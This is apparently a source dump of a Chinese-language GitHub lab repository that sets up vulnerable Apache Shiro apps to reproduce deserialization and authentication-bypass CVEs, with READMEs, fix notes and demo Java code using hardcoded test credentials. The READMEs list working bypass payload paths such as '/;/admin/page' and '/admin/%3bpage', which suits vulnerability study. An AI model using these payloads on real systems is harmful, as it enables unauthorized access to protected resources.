1.5.1 | 16 | | :------------ | :--------------------- | 17 | | Web Server | Tomcat 8.5.53 | 18 | | IDE | IDEA 2020.1.1 ULTIMATE | 19 | 20 | 漏洞成功利用存在下面两个条件: 21 | 
22 | 1. 若Shiro版本大于1.5.1,需要应用不能部署在根目录,如`/test`目录下(原因见参考链接1)。 23 | 2. Spring控制器中没有另外的权限校验代码 24 | 25 | 访问`/admin/page`接口,可以看到被`authc`拦截器拦截了,将会跳转到登录接口进行登录。 26 | 27 | image-20210128172206395 28 | 29 | 访问`/;/admin/page`,成功绕过`authc`拦截器,获取到了资源。 30 | 31 | image-20210128172253231 32 | 33 | ### 参考链接 34 | 35 | * [Apache Shiro权限绕过漏洞分析(CVE-2020-11989)](https://xz.aliyun.com/t/7964) -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/main/java/org/syclover/srpingbootshiro/SrpingbootShiroApplication.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.boot.builder.SpringApplicationBuilder; 6 | import org.springframework.boot.web.servlet.ServletComponentScan; 7 | import org.springframework.boot.web.servlet.support.SpringBootServletInitializer; 8 | 9 | @SpringBootApplication 10 | public class SrpingbootShiroApplication extends SpringBootServletInitializer { 11 | 12 | @Override 13 | protected SpringApplicationBuilder configure(SpringApplicationBuilder builder) { 14 | return builder.sources(SrpingbootShiroApplication.class); 15 | } 16 | 17 | public static void main(String[] args) { 18 | 19 | SpringApplication.run(SrpingbootShiroApplication.class, args); 20 | } 21 | 22 | } 23 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/java/org/test/springbootshiro/MyRealm.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.authc.*; 4 | import org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | public class MyRealm extends 
AuthorizingRealm { 9 | @Override 10 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 11 | return null; 12 | } 13 | 14 | @Override 15 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 16 | String username = (String) authenticationToken.getPrincipal(); 17 | if (!"java".equals(username)){ 18 | throw new UnknownAccountException("unkown user"); 19 | } 20 | return new SimpleAuthenticationInfo(username, "123", getName()); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/java/org/test/springbootshiro/MyRealm.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.authc.*; 4 | import org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | public class MyRealm extends AuthorizingRealm { 9 | @Override 10 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 11 | return null; 12 | } 13 | 14 | @Override 15 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 16 | String username = (String) authenticationToken.getPrincipal(); 17 | if (!"java".equals(username)){ 18 | throw new UnknownAccountException("unkown user"); 19 | } 20 | return new SimpleAuthenticationInfo(username, "123", getName()); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/main/java/org/syclover/srpingbootshiro/MyRealm.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.apache.shiro.authc.*; 4 | import 
org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | public class MyRealm extends AuthorizingRealm { 9 | @Override 10 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 11 | return null; 12 | } 13 | 14 | @Override 15 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 16 | String username = (String) authenticationToken.getPrincipal(); 17 | if (!"java".equals(username)){ 18 | throw new UnknownAccountException("unkown user"); 19 | } 20 | return new SimpleAuthenticationInfo(username, "123", getName()); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 
18 | --%> 19 | 20 | <%-- Forward the user to the home page --%> 21 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | 20 | <%-- Forward the user to the home page --%> 21 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/README.md: -------------------------------------------------------------------------------- 1 | # Shiro 权限绕过漏洞(CVE-2020-17523) 2 | 3 | ### 漏洞描述 4 | 5 | 当Shiro和 Spring 结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包完成身份认证绕过。 6 | 7 | 具体绕过原因有两个: 8 | 9 | 1. tokenizeToStringArray函数没有正确处理空格。 10 | 2. 
处理最后一个/的逻辑,不应在循环匹配路径的逻辑之前。 11 | 12 | 影响范围: 13 | 14 | * Shiro < 1.7.1(升级到 1.7.1 及以上版本即可修复;在控制器方法上另做权限校验可作为纵深防御,不要只依赖 URL 过滤器) 15 | 16 | ### 漏洞复现 17 | 18 | 环境 19 | 20 | | Shiro Version | Shiro 1.5.1 | 21 | | :------------ | :--------------------- | 22 | | Web Server | Tomcat 8.5.53 | 23 | | IDE | IDEA 2020.1.1 ULTIMATE | 24 | 25 | 请求`/admin/test` 302跳转至login: 26 | 27 | image-20210208145249325 28 | 29 | 绕过姿势一:`/admin/%20` 30 | 31 | image-20210208145354757 32 | 33 | 绕过姿势二:`/admin/%2e` 34 | 35 | image-20210208145429278 36 | 37 | ### 参考链接 38 | 39 | * [Shiro 权限绕过漏洞(CVE-2020-11989)](https://github.com/xhycccc/Shiro-Vuln-Demo/tree/main/shiro_cve-2020-11989) -------------------------------------------------------------------------------- /shiro-721/README.md: -------------------------------------------------------------------------------- 1 | # Shiro-721 RememberMe Padding Oracle 漏洞(CVE-2019-12422) 2 | 3 | ### 漏洞描述 4 | 5 | Shiro使用了AES-128-CBC模式对cookie进行加密,该模式易受到[`Padding Oracle`攻击](https://paper.seebug.org/1123/)。 6 | 7 | Shiro处理cookie的流程:得到rememberMe的cookie值 → Base64解码 → AES解密 → 反序列化。 8 | 9 | 所以`padding oracle`攻击方式是,在不需要知道AES密钥且初始化向量IV可控(在rememberMe字段中)的前提下,尝试通过不同IV构造特定的序列化数据,以通过服务器端的**填充(padding)校验**,从而继续后面的反序列化操作。根因在于CBC模式只加密、不校验密文完整性,且服务端对填充错误的处理结果可被外部区分。修复方式:升级到 Shiro 1.4.2 及以上版本(RememberMe 默认改用带完整性校验的 AES-GCM),不需要该功能时可直接关闭 RememberMe。 10 | 11 | ### 漏洞复现 12 | 13 | #### 环境启动 14 | 15 | 将target目录下编译完成的 samples-web-1.4.1.war 包拷贝到 Tomcat 的 webapps 目录下,启动tomcat即可。 16 | 17 | ![20210630171858](20210630171858.jpg) 18 | 19 | #### 复现参考:[Shiro-721 RCE Via Padding Oracle Attack](https://github.com/inspiringz/Shiro-721) 20 | 21 | ### 参考链接 22 | 23 | * [Shiro-721 RCE Via Padding Oracle Attack](https://github.com/inspiringz/Shiro-721) 24 | * [Shiro RCE again(Padding Oracle Attack)](https://www.anquanke.com/post/id/192819) 25 | * [CVE-2019-12422 Shiro721 ( Apache Shiro RememberMe Padding Oracle 1.4.1 反序列化漏洞) 分析 下 ](https://www.guildhab.top/2020/12/cve-2019-12422-shiro721-apache-shiro-rememberme-padding-oracle-1-4-1-反序列化漏洞-分析-下/) -------------------------------------------------------------------------------- 
/shiro_cve-2020-1957/src/main/java/org/javaboy/shirobasic/MyRealm.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.apache.shiro.authc.*; 4 | import org.apache.shiro.authz.AuthorizationInfo; 5 | import org.apache.shiro.realm.AuthorizingRealm; 6 | import org.apache.shiro.subject.PrincipalCollection; 7 | 8 | import javax.security.auth.login.AccountNotFoundException; 9 | 10 | /** 11 | * @Author 江南一点雨 12 | * @Site www.javaboy.org 2019-06-05 11:10 13 | */ 14 | public class MyRealm extends AuthorizingRealm { 15 | @Override 16 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { 17 | return null; 18 | } 19 | 20 | @Override 21 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { 22 | String username = (String) token.getPrincipal(); 23 | if (!"javaboy".equals(username)) { 24 | throw new UnknownAccountException("账户不存在!"); 25 | } 26 | return new SimpleAuthenticationInfo(username, "123", getName()); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/include.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. 
You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ page import="org.apache.shiro.SecurityUtils" %> 20 | <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %> 21 | <%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt" %> 22 | <%@ taglib prefix="shiro" uri="http://shiro.apache.org/tags" %> -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/include.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 
18 | --%> 19 | <%@ page import="org.apache.shiro.SecurityUtils" %> 20 | <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %> 21 | <%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt" %> 22 | <%@ taglib prefix="shiro" uri="http://shiro.apache.org/tags" %> -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Shiro-Vuln-Demo 2 | Shiro漏洞实例源码 3 | 4 | ## Shiro反序列化系列 5 | | 漏洞编号 | CVE | 描述 | 影响范围 | 6 | | --------- | -------------- | -------------------------------------- | ------------- | 7 | | Shiro-550 | CVE-2016-4437 | RememberMe反序列化漏洞 | Shiro < 1.2.4 | 8 | | Shiro-721 | CVE-2019-12422 | RememberMe Padding Oracle 反序列化漏洞 | Shiro < 1.4.2 | 9 | 10 | 11 | 12 | ## Shiro权限绕过系列 13 | | CVE | 描述 | 影响范围 | payload | 14 | | -------------- | ---------------------- | ------------- | ------------------------ | 15 | | CVE-2020-1957 | 权限绕过 | Shiro < 1.5.2 | /hello/123/ | 16 | | CVE-2020-11989 | CVE-2020-1957补丁绕过 | Shiro < 1.5.3 | /;/admin/page | 17 | | CVE-2020-13933 | CVE-2020-11989补丁绕过 | Shiro < 1.6.0 | /admin/%3bpage | 18 | | CVE-2020-17523 | 权限绕过 | Shiro < 1.7.1 | /admin/%20
/admin/%2e | 19 | 20 | 待补充: 21 | 22 | | CVE | 描述 | 备注 | 23 | | -------------- | -------------------------- | ------------- | 24 | | CVE-2016-6802 | Shiro < 1.3.2 验证绕过漏洞 | 无环境、无POC | 25 | | CVE-2020-17510 | Shiro < 1.7.0 验证绕过漏洞 | 有环境、无POC | 26 | 27 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/main/java/org/syclover/srpingbootshiro/LoginController.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PostMapping; 9 | import org.springframework.web.bind.annotation.RestController; 10 | 11 | @RestController 12 | public class LoginController { 13 | @PostMapping("/doLogin") 14 | public void doLogin(String username, String password) { 15 | Subject subject = SecurityUtils.getSubject(); 16 | try { 17 | subject.login(new UsernamePasswordToken(username, password)); 18 | System.out.println("success"); 19 | } catch (AuthenticationException e) { 20 | e.printStackTrace(); 21 | System.out.println("failed"); 22 | } 23 | } 24 | @GetMapping("/admin/page") 25 | public String admin() { 26 | return "admin page"; 27 | } 28 | @GetMapping("/login") 29 | public String login() { 30 | return "please login!"; 31 | } 32 | } -------------------------------------------------------------------------------- /shiro_cve-2020-17510/src/main/java/com/l4g/springshiro/controllers/LoginController.java: -------------------------------------------------------------------------------- 1 | package com.l4g.springshiro.controllers; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import 
org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PostMapping; 9 | import org.springframework.web.bind.annotation.RestController; 10 | 11 | @RestController 12 | public class LoginController { 13 | @PostMapping("/doLogin") 14 | public void doLogin(String username, String password) { 15 | Subject subject = SecurityUtils.getSubject(); 16 | try { 17 | subject.login(new UsernamePasswordToken(username, password)); 18 | System.out.println("success"); 19 | } catch (AuthenticationException e) { 20 | e.printStackTrace(); 21 | System.out.println("fail!"); 22 | } 23 | } 24 | @GetMapping("/admin/hello") 25 | public String hello() { 26 | return "hello"; 27 | } 28 | @GetMapping("/login") 29 | public String login() { 30 | return "please login!"; 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/shiro/MainRealm.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550.shiro; 2 | 3 | import org.apache.shiro.authc.AuthenticationException; 4 | import org.apache.shiro.authc.AuthenticationInfo; 5 | import org.apache.shiro.authc.AuthenticationToken; 6 | import org.apache.shiro.authc.IncorrectCredentialsException; 7 | import org.apache.shiro.authc.SimpleAuthenticationInfo; 8 | import org.apache.shiro.authz.AuthorizationInfo; 9 | import org.apache.shiro.realm.AuthorizingRealm; 10 | import org.apache.shiro.subject.PrincipalCollection; 11 | 12 | public class MainRealm extends AuthorizingRealm { 13 | protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 14 | return null; 15 | } 16 | 17 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 18 | String username = 
(String)authenticationToken.getPrincipal(); 19 | String password = new String((char[])authenticationToken.getCredentials()); 20 | if (username.equals("admin") && password.equals("admin")) 21 | return (AuthenticationInfo)new SimpleAuthenticationInfo(username, password, getName()); 22 | throw new IncorrectCredentialsException("Username or password is incorrect."); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/java/org/test/springbootshiro/LoginController.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PathVariable; 9 | import org.springframework.web.bind.annotation.PostMapping; 10 | import org.springframework.web.bind.annotation.RestController; 11 | 12 | @RestController 13 | public class LoginController { 14 | @PostMapping("/doLogin") 15 | public void doLogin(String username, String password) { 16 | Subject subject = SecurityUtils.getSubject(); 17 | try { 18 | subject.login(new UsernamePasswordToken(username, password)); 19 | System.out.println("success"); 20 | } catch (AuthenticationException e) { 21 | e.printStackTrace(); 22 | System.out.println("failed"); 23 | } 24 | } 25 | @GetMapping("/admin/{name}") 26 | public String admin(@PathVariable String name) { 27 | return "admin page"; 28 | } 29 | @GetMapping("/login") 30 | public String login() { 31 | return "please login!"; 32 | } 33 | } -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/java/org/test/springbootshiro/LoginController.java: 
-------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PathVariable; 9 | import org.springframework.web.bind.annotation.PostMapping; 10 | import org.springframework.web.bind.annotation.RestController; 11 | 12 | /** 13 | * @author jweny 14 | */ 15 | 16 | @RestController 17 | public class LoginController { 18 | @PostMapping("/doLogin") 19 | public void doLogin(String username, String password) { 20 | Subject subject = SecurityUtils.getSubject(); 21 | try { 22 | subject.login(new UsernamePasswordToken(username, password)); 23 | System.out.println("success"); 24 | } catch (AuthenticationException e) { 25 | e.printStackTrace(); 26 | System.out.println("failed"); 27 | } 28 | } 29 | @GetMapping("/admin/{name}") 30 | public String admin(String name) { 31 | return "admin page"; 32 | } 33 | 34 | @GetMapping("/login") 35 | public String login() { 36 | return "please login!"; 37 | } 38 | } -------------------------------------------------------------------------------- /shiro_cve-2020-13933/src/main/java/org/test/springbootshiro/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 4 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 5 | import org.springframework.context.annotation.Bean; 6 | import org.springframework.context.annotation.Configuration; 7 | 8 | import java.util.LinkedHashMap; 9 | import java.util.Map; 10 | 11 | @Configuration 12 | public class ShiroConfig { 13 | @Bean 14 | MyRealm myRealm() { 15 | return new MyRealm(); 16 | } 
17 | 18 | @Bean 19 | DefaultWebSecurityManager securityManager(){ 20 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 21 | manager.setRealm(myRealm()); 22 | return manager; 23 | } 24 | 25 | @Bean 26 | ShiroFilterFactoryBean shiroFilterFactoryBean(){ 27 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 28 | bean.setSecurityManager(securityManager()); 29 | bean.setLoginUrl("/login"); 30 | bean.setSuccessUrl("/index"); 31 | bean.setUnauthorizedUrl("/unauthorizedurl"); 32 | Map map = new LinkedHashMap<>(); 33 | map.put("/doLogin/", "anon"); 34 | map.put("/admin/*", "authc"); 35 | bean.setFilterChainDefinitionMap(map); 36 | return bean; 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/src/main/java/org/test/springbootshiro/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package org.test.springbootshiro; 2 | 3 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 4 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 5 | import org.springframework.context.annotation.Bean; 6 | import org.springframework.context.annotation.Configuration; 7 | 8 | import java.util.LinkedHashMap; 9 | import java.util.Map; 10 | 11 | @Configuration 12 | public class ShiroConfig { 13 | @Bean 14 | MyRealm myRealm() { 15 | return new MyRealm(); 16 | } 17 | 18 | @Bean 19 | DefaultWebSecurityManager securityManager(){ 20 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 21 | manager.setRealm(myRealm()); 22 | return manager; 23 | } 24 | 25 | @Bean 26 | ShiroFilterFactoryBean shiroFilterFactoryBean(){ 27 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 28 | bean.setSecurityManager(securityManager()); 29 | bean.setLoginUrl("/login"); 30 | bean.setSuccessUrl("/index"); 31 | bean.setUnauthorizedUrl("/unauthorizedurl"); 32 | Map map = new LinkedHashMap<>(); 33 | map.put("/doLogin/", "anon"); 34 | 
map.put("/admin/*", "authc"); 35 | bean.setFilterChainDefinitionMap(map); 36 | return bean; 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/src/main/java/org/syclover/srpingbootshiro/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package org.syclover.srpingbootshiro; 2 | 3 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 4 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 5 | import org.springframework.context.annotation.Bean; 6 | import org.springframework.context.annotation.Configuration; 7 | 8 | import java.util.LinkedHashMap; 9 | import java.util.Map; 10 | 11 | @Configuration 12 | public class ShiroConfig { 13 | @Bean 14 | MyRealm myRealm() { 15 | return new MyRealm(); 16 | } 17 | 18 | @Bean 19 | DefaultWebSecurityManager securityManager(){ 20 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 21 | manager.setRealm(myRealm()); 22 | return manager; 23 | } 24 | 25 | @Bean 26 | ShiroFilterFactoryBean shiroFilterFactoryBean(){ 27 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 28 | bean.setSecurityManager(securityManager()); 29 | bean.setLoginUrl("/login"); 30 | bean.setSuccessUrl("/index"); 31 | bean.setUnauthorizedUrl("/unauthorizedurl"); 32 | Map map = new LinkedHashMap<>(); 33 | map.put("/doLogin", "anon"); 34 | map.put("/admin/*", "authc"); 35 | bean.setFilterChainDefinitionMap(map); 36 | return bean; 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /shiro_cve-2020-17510/src/main/java/com/l4g/springshiro/config/ShiroConfig.java: -------------------------------------------------------------------------------- 1 | package com.l4g.springshiro.config; 2 | 3 | import com.l4g.springshiro.MyRealm; 4 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean; 5 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager; 6 | import 
org.springframework.context.annotation.Bean; 7 | import org.springframework.context.annotation.Configuration; 8 | 9 | import java.util.LinkedHashMap; 10 | import java.util.Map; 11 | 12 | @Configuration 13 | public class ShiroConfig { 14 | @Bean 15 | MyRealm myRealm() { 16 | return new MyRealm(); 17 | } 18 | 19 | @Bean 20 | DefaultWebSecurityManager securityManager() { 21 | DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); 22 | manager.setRealm(myRealm()); 23 | return manager; 24 | } 25 | 26 | @Bean 27 | ShiroFilterFactoryBean shiroFilterFactoryBean() { 28 | ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); 29 | bean.setSecurityManager(securityManager()); 30 | bean.setLoginUrl("/login"); 31 | bean.setSuccessUrl("/index"); 32 | bean.setUnauthorizedUrl("/unauthorizedurl"); 33 | Map map = new LinkedHashMap<>(); 34 | map.put("/doLogin", "anon"); 35 | map.put("/admin/*", "authc"); 36 | bean.setFilterChainDefinitionMap(map); 37 | return bean; 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /shiro_cve-2020-1957/src/main/java/org/javaboy/shirobasic/LoginController.java: -------------------------------------------------------------------------------- 1 | package org.javaboy.shirobasic; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.authc.UsernamePasswordToken; 6 | import org.apache.shiro.subject.Subject; 7 | import org.springframework.web.bind.annotation.GetMapping; 8 | import org.springframework.web.bind.annotation.PathVariable; 9 | import org.springframework.web.bind.annotation.PostMapping; 10 | import org.springframework.web.bind.annotation.RestController; 11 | 12 | /** 13 | * @Author 江南一点雨 14 | * @Site www.javaboy.org 2019-06-05 11:24 15 | */ 16 | @RestController 17 | public class LoginController { 18 | @PostMapping("/doLogin") 19 | public void doLogin(String username, String password) { 20 | Subject 
subject = SecurityUtils.getSubject(); 21 | try { 22 | subject.login(new UsernamePasswordToken(username, password)); 23 | System.out.println("登录成功!"); 24 | } catch (AuthenticationException e) { 25 | e.printStackTrace(); 26 | System.out.println("登录失败!"); 27 | } 28 | } 29 | 30 | @GetMapping("/hello/{currentPage}") 31 | public String hello(@PathVariable Integer currentPage) { 32 | return "hello"; 33 | } 34 | 35 | @GetMapping("/login") 36 | public String login() { 37 | return "please login!"; 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/logout.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

If you are not automatically redirected, click the 'Logout' button.

28 | 29 |
" method="post"> 30 | 31 |
32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/logout.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

If you are not automatically redirected, click the 'Logout' button.

28 | 29 |
" method="post"> 30 | 31 |
32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/account/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="../include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

Users only

28 | 29 |

You are currently logged in.

30 | 31 |

">Return to the home page.

32 | 33 |

" onclick="document.getElementById('logout_form').submit();return false;">Log out.

34 |
" method="post">
